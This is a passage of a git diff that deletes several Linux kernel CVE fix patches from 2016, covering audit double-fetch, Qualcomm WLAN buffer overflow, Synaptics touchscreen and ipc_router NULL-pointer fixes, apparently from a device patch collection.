-From 71fe5361cbef34e2d606b79e8936a910a3e95566 Mon Sep 17 00:00:00 2001
-From: Arun Kumar Neelakantam <aneela@codeaurora.org>
-Date: Wed, 21 Sep 2016 18:34:01 +0530
-Subject: net: ipc_router: fix NULL pointer de-reference issue
-
-Fail cases of accept() system call on AF_MSM_IPC socket family causes
-NULL pointer de-reference of sock structure variable in release operation.
-
-Validate the sock structure pointer before using it in release operation.
-
-CRs-Fixed: 1068888
-Change-Id: I5637e52be59ea9504ea6ae317394bef0c28c7865
-Signed-off-by: Arun Kumar Neelakantam <aneela@codeaurora.org>
----
- net/ipc_router/ipc_router_socket.c | 10 +++++++++-
- 1 file changed, 9 insertions(+), 1 deletion(-)
-
-diff --git a/net/ipc_router/ipc_router_socket.c b/net/ipc_router/ipc_router_socket.c
-index 828797b..652531a 100644
---- a/net/ipc_router/ipc_router_socket.c
-+++ b/net/ipc_router/ipc_router_socket.c
-@@ -555,10 +555,18 @@ static unsigned int msm_ipc_router_poll(struct file *file,
- static int msm_ipc_router_close(struct socket *sock)
- {
- 	struct sock *sk = sock->sk;
--	struct msm_ipc_port *port_ptr = msm_ipc_sk_port(sk);
-+	struct msm_ipc_port *port_ptr;
- 	int ret;
- 
-+	if (!sk)
-+		return -EINVAL;
-+
- 	lock_sock(sk);
-+	port_ptr = msm_ipc_sk_port(sk);
-+	if (!port_ptr) {
-+		release_sock(sk);
-+		return -EINVAL;
-+	}
- 	ret = msm_ipc_router_close_port(port_ptr);
- 	msm_ipc_unload_default_node(msm_ipc_sk(sk)->default_node_vote_info);
- 	release_sock(sk);
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-6136/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-6136/ANY/0001.patch
deleted file mode 100644
index 7b6c5bcb..00000000
--- a/Patches/Linux_CVEs/CVE-2016-6136/ANY/0001.patch
+++ /dev/null
@@ -1,416 +0,0 @@
-From 43761473c254b45883a64441dd0bc85a42f3645c Mon Sep 17 00:00:00 2001
-From: Paul Moore <paul@paul-moore.com>
-Date: Tue, 19 Jul 2016 17:42:57 -0400
-Subject: audit: fix a double fetch in audit_log_single_execve_arg()
-
-There is a double fetch problem in audit_log_single_execve_arg()
-where we first check the execve(2) argumnets for any "bad" characters
-which would require hex encoding and then re-fetch the arguments for
-logging in the audit record[1].  Of course this leaves a window of
-opportunity for an unsavory application to munge with the data.
-
-This patch reworks things by only fetching the argument data once[2]
-into a buffer where it is scanned and logged into the audit
-records(s).  In addition to fixing the double fetch, this patch
-improves on the original code in a few other ways: better handling
-of large arguments which require encoding, stricter record length
-checking, and some performance improvements (completely unverified,
-but we got rid of some strlen() calls, that's got to be a good
-thing).
-
-As part of the development of this patch, I've also created a basic
-regression test for the audit-testsuite, the test can be tracked on
-GitHub at the following link:
-
- * https://github.com/linux-audit/audit-testsuite/issues/25
-
-[1] If you pay careful attention, there is actually a triple fetch
-problem due to a strnlen_user() call at the top of the function.
-
-[2] This is a tiny white lie, we do make a call to strnlen_user()
-prior to fetching the argument data.  I don't like it, but due to the
-way the audit record is structured we really have no choice unless we
-copy the entire argument at once (which would require a rather
-wasteful allocation).  The good news is that with this patch the
-kernel no longer relies on this strnlen_user() value for anything
-beyond recording it in the log, we also update it with a trustworthy
-value whenever possible.
-
-Reported-by: Pengfei Wang <wpengfeinudt@gmail.com>
-Cc: <stable@vger.kernel.org>
-Signed-off-by: Paul Moore <paul@paul-moore.com>
----
- kernel/auditsc.c | 332 +++++++++++++++++++++++++++----------------------------
- 1 file changed, 164 insertions(+), 168 deletions(-)
-
-diff --git a/kernel/auditsc.c b/kernel/auditsc.c
-index aa3feec..c65af21 100644
---- a/kernel/auditsc.c
-+++ b/kernel/auditsc.c
-@@ -73,6 +73,7 @@
- #include <linux/compat.h>
- #include <linux/ctype.h>
- #include <linux/string.h>
-+#include <linux/uaccess.h>
- #include <uapi/linux/limits.h>
- 
- #include "audit.h"
-@@ -82,7 +83,8 @@
- #define AUDITSC_SUCCESS 1
- #define AUDITSC_FAILURE 2
- 
--/* no execve audit message should be longer than this (userspace limits) */
-+/* no execve audit message should be longer than this (userspace limits),
-+ * see the note near the top of audit_log_execve_info() about this value */
- #define MAX_EXECVE_AUDIT_LEN 7500
- 
- /* max length to print of cmdline/proctitle value during audit */
-@@ -992,184 +994,178 @@ static int audit_log_pid_context(struct audit_context *context, pid_t pid,
- 	return rc;
- }
- 
--/*
-- * to_send and len_sent accounting are very loose estimates.  We aren't
-- * really worried about a hard cap to MAX_EXECVE_AUDIT_LEN so much as being
-- * within about 500 bytes (next page boundary)
-- *
-- * why snprintf?  an int is up to 12 digits long.  if we just assumed when
-- * logging that a[%d]= was going to be 16 characters long we would be wasting
-- * space in every audit message.  In one 7500 byte message we can log up to
-- * about 1000 min size arguments.  That comes down to about 50% waste of space
-- * if we didn't do the snprintf to find out how long arg_num_len was.
-- */
--static int audit_log_single_execve_arg(struct audit_context *context,
--					struct audit_buffer **ab,
--					int arg_num,
--					size_t *len_sent,
--					const char __user *p,
--					char *buf)
-+static void audit_log_execve_info(struct audit_context *context,
-+				  struct audit_buffer **ab)
- {
--	char arg_num_len_buf[12];
--	const char __user *tmp_p = p;
--	/* how many digits are in arg_num? 5 is the length of ' a=""' */
--	size_t arg_num_len = snprintf(arg_num_len_buf, 12, "%d", arg_num) + 5;
--	size_t len, len_left, to_send;
--	size_t max_execve_audit_len = MAX_EXECVE_AUDIT_LEN;
--	unsigned int i, has_cntl = 0, too_long = 0;
--	int ret;
--
--	/* strnlen_user includes the null we don't want to send */
--	len_left = len = strnlen_user(p, MAX_ARG_STRLEN) - 1;
--
--	/*
--	 * We just created this mm, if we can't find the strings
--	 * we just copied into it something is _very_ wrong. Similar
--	 * for strings that are too long, we should not have created
--	 * any.
--	 */
--	if (WARN_ON_ONCE(len < 0 || len > MAX_ARG_STRLEN - 1)) {
--		send_sig(SIGKILL, current, 0);
--		return -1;
-+	long len_max;
-+	long len_rem;
-+	long len_full;
-+	long len_buf;
-+	long len_abuf;
-+	long len_tmp;
-+	bool require_data;
-+	bool encode;
-+	unsigned int iter;
-+	unsigned int arg;
-+	char *buf_head;
-+	char *buf;
-+	const char __user *p = (const char __user *)current->mm->arg_start;
-+
-+	/* NOTE: this buffer needs to be large enough to hold all the non-arg
-+	 *       data we put in the audit record for this argument (see the
-+	 *       code below) ... at this point in time 96 is plenty */
-+	char abuf[96];
-+
-+	/* NOTE: we set MAX_EXECVE_AUDIT_LEN to a rather arbitrary limit, the
-+	 *       current value of 7500 is not as important as the fact that it
-+	 *       is less than 8k, a setting of 7500 gives us plenty of wiggle
-+	 *       room if we go over a little bit in the logging below */
-+	WARN_ON_ONCE(MAX_EXECVE_AUDIT_LEN > 7500);
-+	len_max = MAX_EXECVE_AUDIT_LEN;
-+
-+	/* scratch buffer to hold the userspace args */
-+	buf_head = kmalloc(MAX_EXECVE_AUDIT_LEN + 1, GFP_KERNEL);
-+	if (!buf_head) {
-+		audit_panic("out of memory for argv string");
-+		return;
- 	}
-+	buf = buf_head;
- 
--	/* walk the whole argument looking for non-ascii chars */
-+	audit_log_format(*ab, "argc=%d", context->execve.argc);
-+
-+	len_rem = len_max;
-+	len_buf = 0;
-+	len_full = 0;
-+	require_data = true;
-+	encode = false;
-+	iter = 0;
-+	arg = 0;
- 	do {
--		if (len_left > MAX_EXECVE_AUDIT_LEN)
--			to_send = MAX_EXECVE_AUDIT_LEN;
--		else
--			to_send = len_left;
--		ret = copy_from_user(buf, tmp_p, to_send);
--		/*
--		 * There is no reason for this copy to be short. We just
--		 * copied them here, and the mm hasn't been exposed to user-
--		 * space yet.
--		 */
--		if (ret) {
--			WARN_ON(1);
--			send_sig(SIGKILL, current, 0);
--			return -1;
--		}
--		buf[to_send] = '\0';
--		has_cntl = audit_string_contains_control(buf, to_send);
--		if (has_cntl) {
--			/*
--			 * hex messages get logged as 2 bytes, so we can only
--			 * send half as much in each message
--			 */
--			max_execve_audit_len = MAX_EXECVE_AUDIT_LEN / 2;
--			break;
--		}
--		len_left -= to_send;
--		tmp_p += to_send;
--	} while (len_left > 0);
--
--	len_left = len;
--
--	if (len > max_execve_audit_len)
--		too_long = 1;
--
--	/* rewalk the argument actually logging the message */
--	for (i = 0; len_left > 0; i++) {
--		int room_left;
--
--		if (len_left > max_execve_audit_len)
--			to_send = max_execve_audit_len;
--		else
--			to_send = len_left;
--
--		/* do we have space left to send this argument in this ab? */
--		room_left = MAX_EXECVE_AUDIT_LEN - arg_num_len - *len_sent;
--		if (has_cntl)
--			room_left -= (to_send * 2);
--		else
--			room_left -= to_send;
--		if (room_left < 0) {
--			*len_sent = 0;
--			audit_log_end(*ab);
--			*ab = audit_log_start(context, GFP_KERNEL, AUDIT_EXECVE);
--			if (!*ab)
--				return 0;
--		}
-+		/* NOTE: we don't ever want to trust this value for anything
-+		 *       serious, but the audit record format insists we
-+		 *       provide an argument length for really long arguments,
-+		 *       e.g. > MAX_EXECVE_AUDIT_LEN, so we have no choice but
-+		 *       to use strncpy_from_user() to obtain this value for
-+		 *       recording in the log, although we don't use it
-+		 *       anywhere here to avoid a double-fetch problem */
-+		if (len_full == 0)
-+			len_full = strnlen_user(p, MAX_ARG_STRLEN) - 1;
-+
-+		/* read more data from userspace */
-+		if (require_data) {
-+			/* can we make more room in the buffer? */
-+			if (buf != buf_head) {
-+				memmove(buf_head, buf, len_buf);
-+				buf = buf_head;
-+			}
-+
-+			/* fetch as much as we can of the argument */
-+			len_tmp = strncpy_from_user(&buf_head[len_buf], p,
-+						    len_max - len_buf);
-+			if (len_tmp == -EFAULT) {
-+				/* unable to copy from userspace */
-+				send_sig(SIGKILL, current, 0);
-+				goto out;
-+			} else if (len_tmp == (len_max - len_buf)) {
-+				/* buffer is not large enough */
-+				require_data = true;
-+				/* NOTE: if we are going to span multiple
-+				 *       buffers force the encoding so we stand
-+				 *       a chance at a sane len_full value and
-+				 *       consistent record encoding */
-+				encode = true;
-+				len_full = len_full * 2;
-+				p += len_tmp;
-+			} else {
-+				require_data = false;
-+				if (!encode)
-+					encode = audit_string_contains_control(
-+								buf, len_tmp);
-+				/* try to use a trusted value for len_full */
-+				if (len_full < len_max)
-+					len_full = (encode ?
-+						    len_tmp * 2 : len_tmp);
-+				p += len_tmp + 1;
-+			}
-+			len_buf += len_tmp;
-+			buf_head[len_buf] = '\0';
- 
--		/*
--		 * first record needs to say how long the original string was
--		 * so we can be sure nothing was lost.
--		 */
--		if ((i == 0) && (too_long))
--			audit_log_format(*ab, " a%d_len=%zu", arg_num,
--					 has_cntl ? 2*len : len);
--
--		/*
--		 * normally arguments are small enough to fit and we already
--		 * filled buf above when we checked for control characters
--		 * so don't bother with another copy_from_user
--		 */
--		if (len >= max_execve_audit_len)
--			ret = copy_from_user(buf, p, to_send);
--		else
--			ret = 0;
--		if (ret) {
--			WARN_ON(1);
--			send_sig(SIGKILL, current, 0);
--			return -1;
-+			/* length of the buffer in the audit record? */
-+			len_abuf = (encode ? len_buf * 2 : len_buf + 2);
- 		}
--		buf[to_send] = '\0';
--
--		/* actually log it */
--		audit_log_format(*ab, " a%d", arg_num);
--		if (too_long)
--			audit_log_format(*ab, "[%d]", i);
--		audit_log_format(*ab, "=");
--		if (has_cntl)
--			audit_log_n_hex(*ab, buf, to_send);
--		else
--			audit_log_string(*ab, buf);
--
--		p += to_send;
--		len_left -= to_send;
--		*len_sent += arg_num_len;
--		if (has_cntl)
--			*len_sent += to_send * 2;
--		else
--			*len_sent += to_send;
--	}
--	/* include the null we didn't log */
--	return len + 1;
--}
- 
--static void audit_log_execve_info(struct audit_context *context,
--				  struct audit_buffer **ab)
--{
--	int i, len;
--	size_t len_sent = 0;
--	const char __user *p;
--	char *buf;
-+		/* write as much as we can to the audit log */
-+		if (len_buf > 0) {
-+			/* NOTE: some magic numbers here - basically if we
-+			 *       can't fit a reasonable amount of data into the
-+			 *       existing audit buffer, flush it and start with
-+			 *       a new buffer */
-+			if ((sizeof(abuf) + 8) > len_rem) {
-+				len_rem = len_max;
-+				audit_log_end(*ab);
-+				*ab = audit_log_start(context,
-+						      GFP_KERNEL, AUDIT_EXECVE);
-+				if (!*ab)
-+					goto out;
-+			}
- 
--	p = (const char __user *)current->mm->arg_start;
-+			/* create the non-arg portion of the arg record */
-+			len_tmp = 0;
-+			if (require_data || (iter > 0) ||
-+			    ((len_abuf + sizeof(abuf)) > len_rem)) {
-+				if (iter == 0) {
-+					len_tmp += snprintf(&abuf[len_tmp],
-+							sizeof(abuf) - len_tmp,
-+							" a%d_len=%lu",
-+							arg, len_full);
-+				}
-+				len_tmp += snprintf(&abuf[len_tmp],
-+						    sizeof(abuf) - len_tmp,
-+						    " a%d[%d]=", arg, iter++);
-+			} else
-+				len_tmp += snprintf(&abuf[len_tmp],
-+						    sizeof(abuf) - len_tmp,
-+						    " a%d=", arg);
-+			WARN_ON(len_tmp >= sizeof(abuf));
-+			abuf[sizeof(abuf) - 1] = '\0';
-+
-+			/* log the arg in the audit record */
-+			audit_log_format(*ab, "%s", abuf);
-+			len_rem -= len_tmp;
-+			len_tmp = len_buf;
-+			if (encode) {
-+				if (len_abuf > len_rem)
-+					len_tmp = len_rem / 2; /* encoding */
-+				audit_log_n_hex(*ab, buf, len_tmp);
-+				len_rem -= len_tmp * 2;
-+				len_abuf -= len_tmp * 2;
-+			} else {
-+				if (len_abuf > len_rem)
-+					len_tmp = len_rem - 2; /* quotes */
-+				audit_log_n_string(*ab, buf, len_tmp);
-+				len_rem -= len_tmp + 2;
-+				/* don't subtract the "2" because we still need
-+				 * to add quotes to the remaining string */
-+				len_abuf -= len_tmp;
-+			}
-+			len_buf -= len_tmp;
-+			buf += len_tmp;
-+		}
- 
--	audit_log_format(*ab, "argc=%d", context->execve.argc);
-+		/* ready to move to the next argument? */
-+		if ((len_buf == 0) && !require_data) {
-+			arg++;
-+			iter = 0;
-+			len_full = 0;
-+			require_data = true;
-+			encode = false;
-+		}
-+	} while (arg < context->execve.argc);
- 
--	/*
--	 * we need some kernel buffer to hold the userspace args.  Just
--	 * allocate one big one rather than allocating one of the right size
--	 * for every single argument inside audit_log_single_execve_arg()
--	 * should be <8k allocation so should be pretty safe.
--	 */
--	buf = kmalloc(MAX_EXECVE_AUDIT_LEN + 1, GFP_KERNEL);
--	if (!buf) {
--		audit_panic("out of memory for argv string");
--		return;
--	}
-+	/* NOTE: the caller handles the final audit_log_end() call */
- 
--	for (i = 0; i < context->execve.argc; i++) {
--		len = audit_log_single_execve_arg(context, ab, i,
--						  &len_sent, p, buf);
--		if (len <= 0)
--			break;
--		p += len;
--	}
--	kfree(buf);
-+out:
-+	kfree(buf_head);
- }
- 
- static void show_special(struct audit_context *context, int *call_panic)
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-6672/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-6672/ANY/0001.patch
deleted file mode 100644
index 436c5316..00000000
--- a/Patches/Linux_CVEs/CVE-2016-6672/ANY/0001.patch
+++ /dev/null
@@ -1,65 +0,0 @@
-From d8649432b96bd361de20168372c10269e88e1258 Mon Sep 17 00:00:00 2001
-From: Min Chong <mchong@google.com>
-Date: Wed, 17 Aug 2016 23:50:14 -0700
-Subject: [PATCH] input: synaptics: allocate heap memory for buffer
-
-Allocate buffer memory on the heap instead of the stack
-to avoid a potential stack overflow in the write function.
-
-Bug: 30537088
-Change-Id: Ibe54ac391ade69e4c0c87bf5332c8bcae730e94c
-Signed-off-by: Ivan Lozano <ivanlozano@google.com>
----
- drivers/input/touchscreen/synaptics_i2c_rmi4.c | 25 ++++++++++++++++---------
- 1 file changed, 16 insertions(+), 9 deletions(-)
-
-diff --git a/drivers/input/touchscreen/synaptics_i2c_rmi4.c b/drivers/input/touchscreen/synaptics_i2c_rmi4.c
-index eade21de3e15d..ecfbe6a3f9a23 100644
---- a/drivers/input/touchscreen/synaptics_i2c_rmi4.c
-+++ b/drivers/input/touchscreen/synaptics_i2c_rmi4.c
-@@ -1214,15 +1214,16 @@ static int synaptics_rmi4_i2c_write(struct synaptics_rmi4_data *rmi4_data,
- {
- 	int retval;
- 	unsigned char retry;
--	unsigned char buf[length + 1];
--	struct i2c_msg msg[] = {
--		{
--			.addr = rmi4_data->i2c_client->addr,
--			.flags = 0,
--			.len = length + 1,
--			.buf = buf,
--		}
--	};
-+	unsigned char *buf;
-+	struct i2c_msg msg[1];
-+
-+	buf = kzalloc(length + 1, GFP_KERNEL);
-+	if (!buf) {
-+		dev_err(&rmi4_data->i2c_client->dev,
-+				"%s: Failed to alloc mem for buffer\n",
-+				__func__);
-+		return -ENOMEM;
-+	}
- 
- 	mutex_lock(&(rmi4_data->rmi4_io_ctrl_mutex));
- 
-@@ -1230,6 +1231,11 @@ static int synaptics_rmi4_i2c_write(struct synaptics_rmi4_data *rmi4_data,
- 	if (retval != PAGE_SELECT_LEN)
- 		goto exit;
- 
-+	msg[0].addr = rmi4_data->i2c_client->addr;
-+	msg[0].flags = 0;
-+	msg[0].len = length + 1;
-+	msg[0].buf = buf;
-+
- 	buf[0] = addr & MASK_8BIT;
- 	memcpy(&buf[1], &data[0], length);
- 
-@@ -1253,6 +1259,7 @@ static int synaptics_rmi4_i2c_write(struct synaptics_rmi4_data *rmi4_data,
- 
- exit:
- 	mutex_unlock(&(rmi4_data->rmi4_io_ctrl_mutex));
-+	kfree(buf);
- 
- 	return retval;
- }
diff --git a/Patches/Linux_CVEs/CVE-2016-6675/prima/0001.patch b/Patches/Linux_CVEs/CVE-2016-6675/prima/0001.patch
deleted file mode 100644
index 3d55ca34..00000000
--- a/Patches/Linux_CVEs/CVE-2016-6675/prima/0001.patch
+++ /dev/null
@@ -1,35 +0,0 @@
-From 1353fa0bd0c78427f3ae7d9bde7daeb75bd01d09 Mon Sep 17 00:00:00 2001
-From: Manjeet Singh <c_manjee@qti.qualcomm.com>
-Date: Tue, 3 May 2016 16:21:46 +0530
-Subject: wlan: fix buffer overflow in linkspeed ioctl
-
-cld to prima propagation.
-
-In linkspeed ioctl handler, mac address array is allocated a
-size of MAC_ADDRESS_STR_LEN, which is 18 bytes taking account of null
-terminator '\0'. But in code, a null terminator is being manually added
-at index MAC_ADDRESS_STR_LEN. This would overflow the buffer and hence
-null terminator should be added at MAC_ADDRESS_STR_LEN -1.
-
-Change-Id: I16c2d0f787dfa339780db7d888aff37355c32322
-CRs-fixed: 1000861
----
- CORE/HDD/src/wlan_hdd_hostapd.c | 2 +-
- 1 file changed, 1 insertion(+), 1 deletion(-)
-
-diff --git a/CORE/HDD/src/wlan_hdd_hostapd.c b/CORE/HDD/src/wlan_hdd_hostapd.c
-index a9167f3..03889a4 100644
---- a/CORE/HDD/src/wlan_hdd_hostapd.c
-+++ b/CORE/HDD/src/wlan_hdd_hostapd.c
-@@ -4662,7 +4662,7 @@ int __iw_get_softap_linkspeed(struct net_device *dev,
-            kfree(pmacAddress);
-            return -EFAULT;
-        }
--       pmacAddress[MAC_ADDRESS_STR_LEN] = '\0';
-+       pmacAddress[MAC_ADDRESS_STR_LEN-1] = '\0';
- 
-        status = hdd_string_to_hex (pmacAddress, MAC_ADDRESS_STR_LEN, macAddress );
-        kfree(pmacAddress);
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-6676/qcacld-2.0/0001.patch b/Patches/Linux_CVEs/CVE-2016-6676/qcacld-2.0/0001.patch
deleted file mode 100644
index d3ff16bf..00000000
--- a/Patches/Linux_CVEs/CVE-2016-6676/qcacld-2.0/0001.patch
+++ /dev/null
@@ -1,33 +0,0 @@
-From 6ba9136879232442a182996427e5c88e5a7512a8 Mon Sep 17 00:00:00 2001
-From: Hanumantha Reddy Pothula <c_hpothu@qti.qualcomm.com>
-Date: Wed, 13 Apr 2016 10:50:46 +0530
-Subject: qcacld-2.0: Resolve buffer overflow issue while processing GET_CFG
- IOCTL
-
-There is a possibility of buffer overflow while processing
-GET_CFG IOCTL to retrieve ini parameters from a global array,
-because of invalid if condition.
-Resolve buffer overflow issue by correcting if condition.
-
-Change-Id: I8881abde0b543d7b1562968ecbb6240a0ca552a3
-CRs-Fixed: 1000853
----
- CORE/HDD/src/wlan_hdd_cfg.c | 2 +-
- 1 file changed, 1 insertion(+), 1 deletion(-)
-
-diff --git a/CORE/HDD/src/wlan_hdd_cfg.c b/CORE/HDD/src/wlan_hdd_cfg.c
-index 2904284..1a669d9 100644
---- a/CORE/HDD/src/wlan_hdd_cfg.c
-+++ b/CORE/HDD/src/wlan_hdd_cfg.c
-@@ -4974,7 +4974,7 @@ static VOS_STATUS hdd_cfg_get_config(REG_TABLE_ENTRY *reg_table,
-       // ideally we want to return the config to the application
-       // however the config is too big so we just printk() for now
- #ifdef RETURN_IN_BUFFER
--      if (curlen <= buflen)
-+      if (curlen < buflen)
-       {
-          // copy string + '\0'
-          memcpy(pCur, configStr, curlen+1);
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-6679/prima/0001.patch b/Patches/Linux_CVEs/CVE-2016-6679/prima/0001.patch
deleted file mode 100644
index de5d237a..00000000
--- a/Patches/Linux_CVEs/CVE-2016-6679/prima/0001.patch
+++ /dev/null
@@ -1,480 +0,0 @@
-From d39345f0abc309959d831d09fcbf1619cc0ae0f5 Mon Sep 17 00:00:00 2001
-From: SaidiReddy Yenuga <c_saidir@qti.qualcomm.com>
-Date: Thu, 26 May 2016 15:07:50 +0530
-Subject: wlan: Remove the support for setwpaie ioctl
-
-This ioctl gets call during the start of SAP/hostapd with wext
-interface and which is obsolete, currently using nl80211 interface
-for the same
-
-Remove the code related to setwpaie ioctl
-
-CRs-Fixed: 1000913
-Change-Id: I8b00db1753d8f72192e4cdb88bc7c638007180fe
----
- CORE/HDD/inc/qc_sap_ioctl.h     |   4 +-
- CORE/HDD/src/wlan_hdd_hostapd.c | 414 ----------------------------------------
- 2 files changed, 2 insertions(+), 416 deletions(-)
-
-diff --git a/CORE/HDD/inc/qc_sap_ioctl.h b/CORE/HDD/inc/qc_sap_ioctl.h
-index dfa7d1c..2bc3b6a 100644
---- a/CORE/HDD/inc/qc_sap_ioctl.h
-+++ b/CORE/HDD/inc/qc_sap_ioctl.h
-@@ -1,5 +1,5 @@
- /*
-- * Copyright (c) 2012-2013 The Linux Foundation. All rights reserved.
-+ * Copyright (c) 2012-2016 The Linux Foundation. All rights reserved.
-  *
-  * Previously licensed under the ISC license by Qualcomm Atheros, Inc.
-  *
-@@ -143,7 +143,7 @@ typedef struct
- #define QCSAP_IOCTL_COMMIT            (SIOCIWFIRSTPRIV+2)
- 
- #define QCSAP_IOCTL_GET_STAWPAIE      (SIOCIWFIRSTPRIV+4)
--#define QCSAP_IOCTL_SETWPAIE          (SIOCIWFIRSTPRIV+5)
-+
- #define QCSAP_IOCTL_STOPBSS           (SIOCIWFIRSTPRIV+6)
- #define QCSAP_IOCTL_VERSION           (SIOCIWFIRSTPRIV+7)
- #define QCSAP_IOCTL_GET_WPS_PBC_PROBE_REQ_IES       (SIOCIWFIRSTPRIV+8)
-diff --git a/CORE/HDD/src/wlan_hdd_hostapd.c b/CORE/HDD/src/wlan_hdd_hostapd.c
-index 03889a4..752a34c 100644
---- a/CORE/HDD/src/wlan_hdd_hostapd.c
-+++ b/CORE/HDD/src/wlan_hdd_hostapd.c
-@@ -3862,417 +3862,6 @@ static int iw_get_mode(struct net_device *dev,
-     return ret;
- }
- 
--static int __iw_softap_setwpsie(struct net_device *dev,
--                              struct iw_request_info *info,
--                              union iwreq_data *wrqu,
--                              char *extra)
--{
--   hdd_adapter_t *pHostapdAdapter;
--   hdd_context_t *pHddCtx;
--   v_CONTEXT_t pVosContext;
--   hdd_hostapd_state_t *pHostapdState;
--   eHalStatus halStatus= eHAL_STATUS_SUCCESS;
--   u_int8_t *wps_genie;
--   u_int8_t *fwps_genie;
--   u_int8_t *pos;
--   tpSap_WPSIE pSap_WPSIe;
--   u_int8_t WPSIeType;
--   u_int16_t length;
--   struct iw_point s_priv_data;
--   int ret = 0;
--
--   ENTER();
--
--   if (!capable(CAP_NET_ADMIN))
--   {
--       VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR,
--                 FL("permission check failed"));
--       return -EPERM;
--   }
--
--   pHostapdAdapter = (netdev_priv(dev));
--   if (NULL == pHostapdAdapter)
--   {
--       VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR,
--                 "%s: Adapter is NULL",__func__);
--       return -EINVAL;
--   }
--   pHddCtx = WLAN_HDD_GET_CTX(pHostapdAdapter);
--   ret = wlan_hdd_validate_context(pHddCtx);
--   if (0 != ret)
--   {
--       return ret;
--   }
--   pVosContext = pHddCtx->pvosContext;
--   if (NULL == pVosContext)
--   {
--       VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR,
--                 "%s: HDD context is not valid ",__func__);
--       return -EINVAL;
--   }
--   /* helper function to get iwreq_data with compat handling. */
--   if (hdd_priv_get_data(&s_priv_data, wrqu))
--   {
--      return -EINVAL;
--   }
--
--   if ((NULL == s_priv_data.pointer) || (s_priv_data.length < QCSAP_MAX_WSC_IE))
--   {
--      return -EINVAL;
--   }
--
--   wps_genie = mem_alloc_copy_from_user_helper(s_priv_data.pointer,
--                                               s_priv_data.length);
--
--   if(NULL == wps_genie)
--   {
--       hddLog(LOG1, "%s: failed to alloc memory "
--                    "and copy data from user buffer", __func__);
--       return -EFAULT;
--   }
--
--   fwps_genie = wps_genie;
--
--   pSap_WPSIe = vos_mem_malloc(sizeof(tSap_WPSIE));
--   if (NULL == pSap_WPSIe) 
--   {
--      hddLog(LOGE, "VOS unable to allocate memory");
--      kfree(fwps_genie);
--      return -ENOMEM;
--   }
--   vos_mem_zero(pSap_WPSIe, sizeof(tSap_WPSIE));
-- 
--   hddLog(LOG1,"%s WPS IE type[0x%X] IE[0x%X], LEN[%d]", __func__, wps_genie[0], wps_genie[1], wps_genie[2]);
--   WPSIeType = wps_genie[0];
--   if ( wps_genie[0] == eQC_WPS_BEACON_IE)
--   {
--      pSap_WPSIe->sapWPSIECode = eSAP_WPS_BEACON_IE; 
--      wps_genie = wps_genie + 1;
--      switch ( wps_genie[0] ) 
--      {
--         case DOT11F_EID_WPA: 
--            if (wps_genie[1] < 2 + 4)
--            {
--               ret = -EINVAL;
--               goto exit;
--            }
--            else if (memcmp(&wps_genie[2], "\x00\x50\xf2\x04", 4) == 0) 
--            {
--             hddLog (LOG1, "%s Set WPS BEACON IE(len %d)",__func__, wps_genie[1]+2);
--             pos = &wps_genie[6];
--             while (((size_t)pos - (size_t)&wps_genie[6])  < (wps_genie[1] - 4) )
--             {
--                switch((u_int16_t)(*pos<<8) | *(pos+1))
--                {
--                   case HDD_WPS_ELEM_VERSION:
--                      pos += 4;
--                      pSap_WPSIe->sapwpsie.sapWPSBeaconIE.Version = *pos;   
--                      hddLog(LOG1, "WPS version %d", pSap_WPSIe->sapwpsie.sapWPSBeaconIE.Version);
--                      pSap_WPSIe->sapwpsie.sapWPSBeaconIE.FieldPresent |= WPS_BEACON_VER_PRESENT;   
--                      pos += 1;
--                      break;
--                   
--                   case HDD_WPS_ELEM_WPS_STATE:
--                      pos +=4;
--                      pSap_WPSIe->sapwpsie.sapWPSBeaconIE.wpsState = *pos;
--                      hddLog(LOG1, "WPS State %d", pSap_WPSIe->sapwpsie.sapWPSBeaconIE.wpsState);
--                      pSap_WPSIe->sapwpsie.sapWPSBeaconIE.FieldPresent |= WPS_BEACON_STATE_PRESENT;
--                      pos += 1;
--                      break;
--                   case HDD_WPS_ELEM_APSETUPLOCK:
--                      pos += 4;
--                      pSap_WPSIe->sapwpsie.sapWPSBeaconIE.APSetupLocked = *pos;
--                      hddLog(LOG1, "AP setup lock %d", pSap_WPSIe->sapwpsie.sapWPSBeaconIE.APSetupLocked);
--                      pSap_WPSIe->sapwpsie.sapWPSBeaconIE.FieldPresent |= WPS_BEACON_APSETUPLOCK_PRESENT;
--                      pos += 1;
--                      break;
--                   case HDD_WPS_ELEM_SELECTEDREGISTRA:
--                      pos += 4;
--                      pSap_WPSIe->sapwpsie.sapWPSBeaconIE.SelectedRegistra = *pos;
--                      hddLog(LOG1, "Selected Registra %d", pSap_WPSIe->sapwpsie.sapWPSBeaconIE.SelectedRegistra);
--                      pSap_WPSIe->sapwpsie.sapWPSBeaconIE.FieldPresent |= WPS_BEACON_SELECTEDREGISTRA_PRESENT;
--                      pos += 1;
--                      break;
--                   case HDD_WPS_ELEM_DEVICE_PASSWORD_ID:
--                      pos += 4;
--                      pSap_WPSIe->sapwpsie.sapWPSBeaconIE.DevicePasswordID = (*pos<<8) | *(pos+1);
--                      hddLog(LOG1, "Password ID: %x", pSap_WPSIe->sapwpsie.sapWPSBeaconIE.DevicePasswordID);
--                      pSap_WPSIe->sapwpsie.sapWPSBeaconIE.FieldPresent |= WPS_BEACON_DEVICEPASSWORDID_PRESENT;
--                      pos += 2; 
--                      break;
--                   case HDD_WPS_ELEM_REGISTRA_CONF_METHODS:
--                      pos += 4;
--                      pSap_WPSIe->sapwpsie.sapWPSBeaconIE.SelectedRegistraCfgMethod = (*pos<<8) | *(pos+1);
--                      hddLog(LOG1, "Select Registra Config Methods: %x", pSap_WPSIe->sapwpsie.sapWPSBeaconIE.SelectedRegistraCfgMethod);
--                      pSap_WPSIe->sapwpsie.sapWPSBeaconIE.FieldPresent |= WPS_BEACON_SELECTEDREGISTRACFGMETHOD_PRESENT;
--                      pos += 2; 
--                      break;
--                
--                   case HDD_WPS_ELEM_UUID_E:
--                      pos += 2; 
--                      length = *pos<<8 | *(pos+1);
--                      pos += 2;
